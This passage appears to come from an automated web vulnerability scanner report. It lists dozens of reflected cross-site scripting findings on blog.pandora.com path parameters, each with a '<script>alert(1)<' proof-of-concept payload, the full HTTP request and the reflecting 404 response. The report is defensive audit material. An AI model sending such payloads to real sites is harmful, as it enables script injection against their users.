HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6f725<script>alert(1)< ...[SNIP]... |
3.277. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20104a6a1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20104a6a1<script>alert(1)< ...[SNIP]... |
3.278. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1093473<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 368 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1093473<script>alert(1)< ...[SNIP]... |
3.279. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10 ...[SNIP]... |
3.280. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa04ff<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa04ff<script>alert(1)< ...[SNIP]... |
3.281. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6b806<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6b806<script>alert(1)< ...[SNIP]... |
3.282. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20108496d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20108496d<script>alert(1)< ...[SNIP]... |
3.283. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10297e2<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)< ...[SNIP]... |
3.284. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10 ...[SNIP]... |
3.285. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeade<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeade<script>alert(1)< ...[SNIP]... |
3.286. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5f952<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5f952<script>alert(1)< ...[SNIP]... |
3.287. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102f17b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20102f17b<script>alert(1)< ...[SNIP]... |
3.288. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10976b9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)< ...[SNIP]... |
3.289. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10 ...[SNIP]... |
3.290. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora27324<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora27324<script>alert(1)< ...[SNIP]... |
3.291. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives31461<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives31461<script>alert(1)< ...[SNIP]... |
3.292. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010a1142<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010a1142<script>alert(1)< ...[SNIP]... |
3.293. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/118f51a<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)< ...[SNIP]... |
3.294. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora72e6e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora72e6e<script>alert(1)< ...[SNIP]... |
3.295. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa3828<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa3828<script>alert(1)< ...[SNIP]... |
3.296. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201039bf5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201039bf5<script>alert(1)< ...[SNIP]... |
3.297. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11a869d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)< ...[SNIP]... |
3.298. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11 ...[SNIP]... |
3.299. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23985<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23985<script>alert(1)< ...[SNIP]... |
3.300. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2c61d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2c61d<script>alert(1)< ...[SNIP]... |
3.301. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20105f834<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20105f834<script>alert(1)< ...[SNIP]... |
3.302. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/114a98f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)< ...[SNIP]... |
3.303. http://blog.pandora.com/pandora/archives/2010/11/sioux-falls-and.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11 ...[SNIP]... |
3.304. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2056f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2056f<script>alert(1)< ...[SNIP]... |
3.305. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/11 |
Issue detail
